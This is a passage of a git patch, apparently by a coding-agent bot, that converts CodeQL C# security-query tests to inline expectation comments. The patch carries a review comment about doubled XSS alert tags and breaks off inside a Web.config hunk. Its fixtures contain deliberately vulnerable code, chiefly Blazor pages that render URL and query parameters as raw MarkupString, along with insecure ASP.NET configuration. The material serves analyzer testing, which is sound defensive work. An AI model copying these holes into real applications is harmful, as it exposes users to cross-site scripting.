From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 21:25:03 +0000 Subject: [PATCH 11/15] Convert C# qlref tests to inline expectations --- .../BlazorTest/Components/MyOutput.razor | 2 +- .../Components/Pages/TestPage.razor | 6 ++-- .../all-platforms/blazor/XSS.qlref | 4 ++- .../BlazorTest/Components/MyOutput.razor | 2 +- .../Components/Pages/TestPage.razor | 6 ++-- .../blazor_build_mode_none/XSS.qlref | 4 ++- .../BlazorTest/Components/MyOutput.razor | 2 +- .../Components/Pages/TestPage.razor | 6 ++-- .../all-platforms/blazor_net_8/XSS.qlref | 4 ++- .../Components_Pages_TestPage_razor.g.cs | 4 +-- .../microsoft/aspnetcore/blazor/Name.cs | 4 +-- .../microsoft/aspnetcore/blazor/NameList.cs | 4 +-- .../microsoft/aspnetcore/blazor/NameList2.cs | 4 +-- .../microsoft/aspnetcore/blazor/Xss.qlref | 4 ++- .../BlockCodeResponseWrite.qlref | 1 + .../BlockCodeResponseWriteBad.aspx | 2 +- .../ASP/BlockCodeResponseWrite/test.aspx | 2 +- .../ComplexInlineCode/ComplexInlineCode.qlref | 1 + .../ComplexInlineCodeBad.aspx | 2 +- .../ASP/ComplexInlineCode/test.aspx | 2 +- .../NonInternationalizedText.qlref | 1 + .../NonInternationalizedTextBad.aspx | 2 +- .../ASP/NonInternationalizedText/test.aspx | 2 +- .../SplitControlStructure.qlref | 1 + .../SplitControlStructureBad.aspx | 2 +- .../ASP/SplitControlStructure/test.aspx | 2 +- .../EmptyPasswordInConfigurationFile.qlref | 1 + .../PasswordInConfigurationFile.qlref | 1 + .../PasswordInConfigurationFile/config.xml | 16 ++++----- .../CWE-011/ASPNetDebug.qlref | 1 + .../Security Features/CWE-011/bad1/Web.config | 2 +- .../Security Features/CWE-011/bad2/Web.config | 2 +- .../ASPNetMaxRequestLength.qlref | 1 + .../ASPNetMaxRequestLength/bad/Web.config | 4 +-- .../ASPNetPagesValidateRequest.qlref | 1 + .../ASPNetPagesValidateRequestBad.config | 4 +-- .../ASPNetRequestValidationMode.qlref | 1 + .../ASPNetRequestValidationModeBad.config | 2 +- .../CWE-020/UntrustedData.cs | 4 +-- 
.../CWE-020/UntrustedDataToExternalAPI.qlref | 4 ++- .../CWE-022/TaintedPath/TaintedPath.cs | 16 ++++----- .../CWE-022/TaintedPath/TaintedPath.qlref | 4 ++- .../CWE-022/ZipSlip/ZipSlip.cs | 22 ++++++------ .../CWE-022/ZipSlip/ZipSlip.qlref | 4 ++- .../CWE-022/ZipSlip/ZipSlipBad.cs | 4 +-- .../CWE-078/CommandInjection.cs | 16 ++++----- .../CWE-078/CommandInjection.qlref | 4 ++- .../CWE-079/StoredXSS/StoredXSS.cs | 4 +-- .../CWE-079/StoredXSS/StoredXSS.qlref | 4 ++- .../Security Features/CWE-079/XSSAsp/XSS.cs | 36 +++++++++---------- .../CWE-079/XSSAsp/XSS.qlref | 4 ++- .../CWE-079/XSSAsp/script.aspx | 6 ++-- .../CWE-079/XSSRazorPages/XSS.qlref | 1 + .../CWE-090/LDAPInjection.cs | 18 +++++----- .../CWE-090/LDAPInjection.qlref | 4 ++- .../CWE-091/XMLInjection/Test.cs | 4 +-- .../CWE-091/XMLInjection/XMLInjection.qlref | 4 ++- .../CWE-094/CodeInjection.cs | 8 ++--- .../CWE-094/CodeInjection.qlref | 4 ++- .../CWE-099/ResourceInjection.cs | 6 ++-- .../CWE-099/ResourceInjection.qlref | 4 ++- .../CWE-112/MissingXMLValidation.cs | 10 +++--- .../CWE-112/MissingXMLValidation.qlref | 4 ++- .../AssemblyPathInjection.qlref | 4 ++- .../CWE-114/AssemblyPathInjection/Test.cs | 4 +-- .../ExposureInTransmittedData.cs | 18 +++++----- .../ExposureInTransmittedData.qlref | 4 ++- .../CWE-209/ExceptionInformationExposure.cs | 14 ++++---- .../ExceptionInformationExposure.qlref | 4 ++- .../MissingASPNETGlobalErrorHandler.qlref | 1 + .../WebConfigOff/Web.config | 2 +- .../HardcodedSymmetricEncryptionKey.cs | 16 ++++----- .../HardcodedSymmetricEncryptionKey.qlref | 4 ++- .../CWE-338/InsecureRandomness.cs | 14 ++++---- .../CWE-338/InsecureRandomness.qlref | 4 ++- .../MissingAntiForgeryTokenValidation.cs | 4 +-- .../MissingAntiForgeryTokenValidation.qlref | 1 + .../NoHeader/MissingXFrameOptions.qlref | 1 + .../MissingXFrameOptions/NoHeader/Web.config | 2 +- .../CWE-548/ASPNetDirectoryListing.qlref | 1 + .../Security Features/CWE-548/web.config | 2 +- .../CWE-601/UrlRedirect/UrlRedirect.cs | 16 
++++----- .../CWE-601/UrlRedirect/UrlRedirect.qlref | 4 ++- .../CWE-601/UrlRedirect/UrlRedirect2.cs | 2 +- .../CWE-601/UrlRedirect/UrlRedirectCore.cs | 24 ++++++------- .../Security Features/CWE-611/Test.cs | 6 ++-- .../CWE-611/UntrustedDataInsecureXml.qlref | 4 ++- .../CWE-611/UseXmlSecureResolver.qlref | 4 ++- .../HttpCookiesCorrect/RequireSSL.qlref | 1 + .../RequireSSL/HttpCookiesCorrect/Web.config | 2 +- .../RequireSSLMissing/RequireSSL.qlref | 1 + .../RequireSSL/RequireSSLMissing/Web.config | 4 +-- .../CWE-643/XPathInjection.cs | 24 ++++++------- .../CWE-643/XPathInjection.qlref | 4 ++- .../CWE-730/ReDoS/ExponentialRegex.cs | 12 +++---- .../CWE-730/ReDoS/ReDoS.qlref | 4 ++- .../CWE-730/ReDoSGlobalTimeout/ReDoS.qlref | 4 ++- .../CWE-730/RegexInjection/RegexInjection.cs | 4 +-- .../RegexInjection/RegexInjection.qlref | 4 ++- .../CWE-807/ConditionalBypass.cs | 24 ++++++------- .../CWE-807/ConditionalBypass.qlref | 4 ++- .../Security Features/CWE-838/HtmlEncode.cs | 2 +- .../CWE-838/InappropriateEncoding.cs | 24 ++++++------- .../CWE-838/InappropriateEncoding.qlref | 4 ++- .../Security Features/CWE-838/SqlEncode.cs | 4 +-- .../Security Features/CWE-838/UrlEncode.cs | 2 +- 106 files changed, 337 insertions(+), 262 deletions(-) diff --git a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/MyOutput.razor b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/MyOutput.razor index e583e6b2e9c6..5476d75ccf9b 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/MyOutput.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/MyOutput.razor @@ -2,7 +2,7 @@

    Value from InputText: @Value

    -

    Raw value from InputText: @(new MarkupString(Value))

    +

    Raw value from InputText: @(new MarkupString(Value))

    @* $ Alert[cs/web/xss]=r1 *@
    @code {
diff --git a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor
index ac3ccbe19207..7a7a02ec222d 100644
--- a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor
+++ b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor
@@ -8,7 +8,7 @@

    Route parameter

    Go to: /test/@XssUrl

    Parameter from URL: @UrlParam

    -

    Raw parameter from URL: @((MarkupString)UrlParam)

    +

    Raw parameter from URL: @((MarkupString)UrlParam)

    @* $ Alert[cs/web/xss]=r2 $ Alert[cs/web/xss]=r2 *@
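Review bot: The added expectation on the `Raw parameter from URL` line lists `Alert[cs/web/xss]=r2` twice, and no `Source[cs/web/xss]=r2` appears in this file's hunks (the only `Source` visible is `r1`, in the `-82` hunk). If two distinct results are really expected at this sink, say so in the comment so a later cleanup does not collapse them; otherwise reduce it to `@* $ Alert[cs/web/xss]=r2 *@`. The same doubled tag appears in the `-17` hunk (`r3`), in the `blazor_build_mode_none` and `blazor_net_8` copies of this file, in `Components_Pages_TestPage_razor.g.cs`, and in `UntrustedData.cs` (`r1`). Because these fixtures pin XSS detection on raw `MarkupString` output, the tag pairing should be checked against the inline-expectations rules rather than left implicit.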
    @@ -17,7 +17,7 @@

    Query parameter

    Go to: /test/?qs=@XssUrl

    Parameter from query string: @QueryParam

    -

    Raw parameter from query string: @(new MarkupString(QueryParam))

    +

    Raw parameter from query string: @(new MarkupString(QueryParam))

    @* $ Alert[cs/web/xss]=r3 $ Alert[cs/web/xss]=r3 *@
    @@ -82,7 +82,7 @@
    - + @* $ Source[cs/web/xss]=r1 *@
    @code {
diff --git a/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref
index 89b5b951bdb6..a71d47846701 100644
--- a/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref
+++ b/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref
@@ -1,2 +1,4 @@
 query: Security Features/CWE-079/XSS.ql
-postprocess: utils/test/PrettyPrintModels.ql
+postprocess:
+ - utils/test/PrettyPrintModels.ql
+ - utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/MyOutput.razor b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/MyOutput.razor
index e583e6b2e9c6..5476d75ccf9b 100644
--- a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/MyOutput.razor
+++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/MyOutput.razor
@@ -2,7 +2,7 @@

    Value from InputText: @Value

    -

    Raw value from InputText: @(new MarkupString(Value))

    +

    Raw value from InputText: @(new MarkupString(Value))

    @* $ Alert[cs/web/xss]=r1 *@
    @code {
diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor
index ac3ccbe19207..7a7a02ec222d 100644
--- a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor
+++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor
@@ -8,7 +8,7 @@

    Route parameter

    Go to: /test/@XssUrl

    Parameter from URL: @UrlParam

    -

    Raw parameter from URL: @((MarkupString)UrlParam)

    +

    Raw parameter from URL: @((MarkupString)UrlParam)

    @* $ Alert[cs/web/xss]=r2 $ Alert[cs/web/xss]=r2 *@
    @@ -17,7 +17,7 @@

    Query parameter

    Go to: /test/?qs=@XssUrl

    Parameter from query string: @QueryParam

    -

    Raw parameter from query string: @(new MarkupString(QueryParam))

    +

    Raw parameter from query string: @(new MarkupString(QueryParam))

    @* $ Alert[cs/web/xss]=r3 $ Alert[cs/web/xss]=r3 *@
    @@ -82,7 +82,7 @@
    - + @* $ Source[cs/web/xss]=r1 *@
    @code {
diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref
index 89b5b951bdb6..a71d47846701 100644
--- a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref
+++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref
@@ -1,2 +1,4 @@
 query: Security Features/CWE-079/XSS.ql
-postprocess: utils/test/PrettyPrintModels.ql
+postprocess:
+ - utils/test/PrettyPrintModels.ql
+ - utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/MyOutput.razor b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/MyOutput.razor
index e583e6b2e9c6..5476d75ccf9b 100644
--- a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/MyOutput.razor
+++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/MyOutput.razor
@@ -2,7 +2,7 @@

    Value from InputText: @Value

    -

    Raw value from InputText: @(new MarkupString(Value))

    +

    Raw value from InputText: @(new MarkupString(Value))

    @* $ Alert[cs/web/xss]=r1 *@
    @code {
diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor
index ac3ccbe19207..7a7a02ec222d 100644
--- a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor
+++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor
@@ -8,7 +8,7 @@

    Route parameter

    Go to: /test/@XssUrl

    Parameter from URL: @UrlParam

    -

    Raw parameter from URL: @((MarkupString)UrlParam)

    +

    Raw parameter from URL: @((MarkupString)UrlParam)

    @* $ Alert[cs/web/xss]=r2 $ Alert[cs/web/xss]=r2 *@
    @@ -17,7 +17,7 @@

    Query parameter

    Go to: /test/?qs=@XssUrl

    Parameter from query string: @QueryParam

    -

    Raw parameter from query string: @(new MarkupString(QueryParam))

    +

    Raw parameter from query string: @(new MarkupString(QueryParam))

    @* $ Alert[cs/web/xss]=r3 $ Alert[cs/web/xss]=r3 *@
    @@ -82,7 +82,7 @@
    - + @* $ Source[cs/web/xss]=r1 *@
    @code { diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref +++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Components_Pages_TestPage_razor.g.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Components_Pages_TestPage_razor.g.cs index 8732f8c7e4be..372ee49242fd 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Components_Pages_TestPage_razor.g.cs +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Components_Pages_TestPage_razor.g.cs @@ -135,7 +135,7 @@ protected override void BuildRenderTree(global::Microsoft.AspNetCore.Components. __builder.AddContent(18, "Raw parameter from URL: "); __builder.AddContent(19, #nullable restore -(MarkupString)UrlParam +(MarkupString)UrlParam // $ Alert[cs/web/xss]=r1 $ Alert[cs/web/xss]=r1 #line default #line hidden @@ -185,7 +185,7 @@ protected override void BuildRenderTree(global::Microsoft.AspNetCore.Components. __builder.AddContent(35, "Raw parameter from query string: "); __builder.AddContent(36, #nullable restore -new MarkupString(QueryParam) +new MarkupString(QueryParam) // $ Alert[cs/web/xss]=r2 $ Alert[cs/web/xss]=r2 #line default #line hidden diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs index a9d098470e44..344f5cbf6ac3 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs 
+++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs @@ -10,7 +10,7 @@ protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Renderin { builder.OpenElement(0, "div"); builder.OpenElement(1, "p"); - builder.AddContent(2, (MarkupString)TheName); + builder.AddContent(2, (MarkupString)TheName); // $ Alert[cs/web/xss]=r3 $ Alert[cs/web/xss]=r4 builder.CloseElement(); builder.CloseElement(); } @@ -19,4 +19,4 @@ protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Renderin [Parameter] public string TheName { get; set; } } -} \ No newline at end of file +} diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs index ceffb35303e5..31126310dff1 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs @@ -28,7 +28,7 @@ protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Renderin builder.OpenElement(6, "p"); builder.AddContent(7, "Name: "); builder.OpenComponent(8); - builder.AddComponentParameter(9, nameof(VulnerableBlazorApp.Components.Name.TheName), Name); + builder.AddComponentParameter(9, nameof(VulnerableBlazorApp.Components.Name.TheName), Name); // $ Source[cs/web/xss]=r4 builder.CloseComponent(); builder.CloseElement(); } @@ -47,4 +47,4 @@ protected override void OnParametersSet() public List Names { get; set; } = new List(); } -} \ No newline at end of file +} diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList2.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList2.cs index d27d6f2dcde9..fc6298943d3a 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList2.cs +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList2.cs 
@@ -28,7 +28,7 @@ protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Renderin builder.OpenElement(6, "p"); builder.AddContent(7, "Name: "); builder.OpenComponent(8); - builder.AddComponentParameter(9, "TheName", Name); + builder.AddComponentParameter(9, "TheName", Name); // $ Source[cs/web/xss]=r3 builder.CloseComponent(); builder.CloseElement(); } @@ -47,4 +47,4 @@ protected override void OnParametersSet() public List Names { get; set; } = new List(); } -} \ No newline at end of file +} diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref index b0835a02ad78..35d5389b7189 100644 --- a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref +++ b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref @@ -1 +1,2 @@ query: ASP/BlockCodeResponseWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWriteBad.aspx b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWriteBad.aspx index 1e4a0fffc015..ebf2cadc8b3f 100644 --- a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWriteBad.aspx 
+++ b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWriteBad.aspx @@ -2,6 +2,6 @@ -

    2 + 3 = <%Response.Write(2 + 3)%>

    +

    2 + 3 = <%Response.Write(2 + 3)%>

    <%-- $ Alert[cs/asp/response-write] --%> diff --git a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/test.aspx b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/test.aspx index 1e4a0fffc015..ebf2cadc8b3f 100644 --- a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/test.aspx +++ b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/test.aspx @@ -2,6 +2,6 @@ -

    2 + 3 = <%Response.Write(2 + 3)%>

    +

    2 + 3 = <%Response.Write(2 + 3)%>

    <%-- $ Alert[cs/asp/response-write] --%> diff --git a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref index 90a69bb4a3b8..9a5bdd6c37e6 100644 --- a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref +++ b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref @@ -1 +1,2 @@ query: ASP/ComplexInlineCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCodeBad.aspx b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCodeBad.aspx index f4457d89606f..b8e0a25ac2c8 100644 --- a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCodeBad.aspx +++ b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCodeBad.aspx @@ -15,6 +15,6 @@ } else { ec.Emit (Response, OpCodes.Ldloca, builder); } -%> +%> <%-- $ Alert[cs/asp/complex-inline-code] --%> diff --git a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/test.aspx b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/test.aspx index 1c2d09586ab5..39055702e35c 100644 --- a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/test.aspx +++ b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/test.aspx @@ -9,7 +9,7 @@ Response.write(3 + 2); } End If -%>

    +%>

    <%-- $ Alert[cs/asp/complex-inline-code] --%>

    2 + 3 = <%=2 + 3%>

    diff --git a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref index ac1b3e989b4c..0ca3c026d73e 100644 --- a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref +++ b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref @@ -1 +1,2 @@ query: ASP/NonInternationalizedText.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedTextBad.aspx b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedTextBad.aspx index 2d5e7757d3af..935a9c19e0ef 100644 --- a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedTextBad.aspx +++ b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedTextBad.aspx @@ -2,6 +2,6 @@ -

    Amount: <%= Amount %>

    +

    Amount: <%= Amount %>

    <%-- $ Alert[cs/asp/text-not-internationalized] --%> diff --git a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/test.aspx b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/test.aspx index 44b6ab46947f..7027d6a07cb9 100644 --- a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/test.aspx +++ b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/test.aspx @@ -2,6 +2,6 @@ -

    This text is plain English.

    +

    This text is plain English.

    <%-- $ Alert[cs/asp/text-not-internationalized] --%> diff --git a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref index c02b4a97ae47..57c16f0abe63 100644 --- a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref +++ b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref @@ -1 +1,2 @@ query: ASP/SplitControlStructure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructureBad.aspx b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructureBad.aspx index 4ef3f00f3bfc..870c3df8fd37 100644 --- a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructureBad.aspx +++ b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructureBad.aspx @@ -2,7 +2,7 @@ -<% If ShouldWarn() Then %> +<% If ShouldWarn() Then %> <%-- $ Alert[cs/asp/split-control-structure] --%>

    WARNING: <%=warning()%>

    <% End If %> diff --git a/csharp/ql/test/query-tests/ASP/SplitControlStructure/test.aspx b/csharp/ql/test/query-tests/ASP/SplitControlStructure/test.aspx index 8cd7245d0ca6..69d889b570a5 100644 --- a/csharp/ql/test/query-tests/ASP/SplitControlStructure/test.aspx +++ b/csharp/ql/test/query-tests/ASP/SplitControlStructure/test.aspx @@ -2,7 +2,7 @@ -<% If Something() Then %> +<% If Something() Then %> <%-- $ Alert[cs/asp/split-control-structure] --%>

    2 + 3 = <%=2 + 3%>

    <% End If %> diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref index 94937ccf811b..75899b3d5f2e 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref @@ -1 +1,2 @@ query: Configuration/EmptyPasswordInConfigurationFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref index 0479b5098f3d..9ae43388c25c 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref @@ -1 +1,2 @@ query: Configuration/PasswordInConfigurationFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/config.xml b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/config.xml index a72d5f8fa752..7a5f382236f8 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/config.xml +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/config.xml @@ -1,15 +1,15 @@ - - + + - - + + - - - - + + + + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref b/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref index f7d09f0bf5cd..f197b183e75e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref 
+++ b/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref @@ -1 +1,2 @@ query: Security Features/CWE-011/ASPNetDebug.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-011/bad1/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-011/bad1/Web.config index ffc04c240fae..c79a46e2c881 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-011/bad1/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-011/bad1/Web.config @@ -4,6 +4,6 @@ + /> diff --git a/csharp/ql/test/query-tests/Security Features/CWE-011/bad2/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-011/bad2/Web.config index ffc04c240fae..c79a46e2c881 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-011/bad2/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-011/bad2/Web.config @@ -4,6 +4,6 @@ + /> diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref index a2914c126c3c..5c2fc1ad4f63 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref @@ -1 +1,2 @@ query: Security Features/CWE-016/ASPNetMaxRequestLength.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/bad/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/bad/Web.config index ea52bd2505b8..a9e98986c4cb 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/bad/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/bad/Web.config 
